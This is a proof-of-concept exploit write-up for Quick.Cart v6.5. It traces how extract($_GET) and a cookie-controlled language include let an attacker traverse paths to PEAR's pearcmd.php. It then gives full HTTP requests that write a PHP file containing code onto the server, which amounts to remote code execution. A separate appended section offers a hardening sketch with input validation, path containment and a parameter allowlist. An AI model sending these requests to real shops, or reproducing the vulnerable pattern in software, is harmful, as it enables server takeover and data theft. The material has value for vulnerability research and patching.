POC - Quick.Cart v6.5 - Local File Inclusion
[LFI] Quick.Cart v6.5
admin.php::
... SNIP ...
extract( $_GET );
define( 'ADMIN_PAGE', true );
... SNIP ...
Funny: user input is passed directly to extract() x) --- we will need this later...
admin.php::
... SNIP ...
require 'database/config/general.php';
... SNIP ...
Let's dig here :p
database/config/general.php::
... SNIP ...
$config['change_language_to_polish'] = true;
if( !defined( 'CUSTOMER_PAGE' ) &&
!empty( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) &&
$config['change_language_to_polish'] === true &&
preg_match( '/pl-|pl,|^pl$/', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
... SNIP ...
if( isset( $_COOKIE['sAdminLanguage'] ) )
$config['admin_lang']= $_COOKIE['sAdminLanguage'];
... SNIP ...
require_once defined( 'CUSTOMER_PAGE' ) ? $config['dir_lang'].LANGUAGE.'.php' : ( is_file( $config['dir_lang'].$config['admin_lang'].'.php' ) ? $config['dir_lang'].$config['admin_lang'].'.php' : $config['dir_lang'].LANGUAGE.'.php' );
... SNIP ...
1. In "admin.php", CUSTOMER_PAGE is not defined
2. We can set the header "Accept-Language: pl-PL,pl;"
3. We control the cookies too
Which means:
$config['admin_lang'] is controlled :D
So we can include any file that ends in ".php"
The path must point to a real file (is_file) -_-"
Actually, nothing good to do with that...
Maybe we can use the PEAR sources :p
GET /qcv56/admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;
Well done ... let's use the "extract($_GET)" to pass arguments to PEAR
-s -c ./files/83f2a5ec3fca.php -d preferred_mirror="<?php phpinfo() ?>"
tricky :p ...
GET /qcv56/admin.php?argv[]=&argv[]=-s&argv[]=-c&argv[]=./files/83f2a5ec3fca.php&argv[]=-dpreferred_mirror=<?php%20phpinfo()%20?> HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;
GET /qcv56/files/83f2a5ec3fca.php HTTP/1.1
Host: 127.0.0.1
Connection: close
file created :)
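One way to close both inputs this PoC relies on (the sAdminLanguage cookie reaching require_once, and extract($_GET) creating variables such as $argv), as an added example that is not Quick.Cart's code or the author's. The function names, the two-to-three-letter language code format, the demo directory and the "p" parameter are assumptions made for illustration.

```php
<?php
// Added hardening sketch; all names here are hypothetical, not Quick.Cart's.

// Map a client-supplied language code to a file inside $langDir,
// falling back to $default when the value is not acceptable.
function resolveAdminLangFile(string $langDir, ?string $requested, string $default): string
{
    $fallback = $langDir . $default . '.php';
    // 1. Shape check: short alphabetic code only, so "/" and "." never pass.
    if ($requested === null || !preg_match('/\A[a-z]{2,3}\z/', $requested)) {
        return $fallback;
    }
    // 2. Containment check: the canonical path must stay inside $langDir.
    $base = realpath($langDir);
    $real = realpath($langDir . $requested . '.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $fallback;
    }
    return $real;
}

// Replacement for extract($_GET): copy only the parameters the page expects,
// so a query string cannot define arbitrary globals (argv in the PoC above).
function readParams(array $query, array $allowed): array
{
    return array_intersect_key($query, array_flip($allowed));
}

// Constructed demo data: a temporary language directory with two files.
$dir = sys_get_temp_dir() . '/qc_lang_demo/';
@mkdir($dir);
file_put_contents($dir . 'en.php', '<?php // en');
file_put_contents($dir . 'pl.php', '<?php // pl');

// Constructed cookie values: valid, unknown, traversal (as in the PoC), absent.
$cases = ['pl', 'xx', '../../../../usr/lib/php/pearcmd', null];
foreach ($cases as $c) {
    $file = basename(resolveAdminLangFile($dir, $c, 'en'));
    printf("%-40s => %s\n", var_export($c, true), $file);
}

// Constructed query: "p" is kept, the injected "argv" array is dropped.
var_dump(readParams(['p' => 'orders', 'argv' => ['-s', '-c']], ['p']));
```

Only the first case resolves to pl.php; the unknown code, the traversal string and the missing cookie all fall back to en.php.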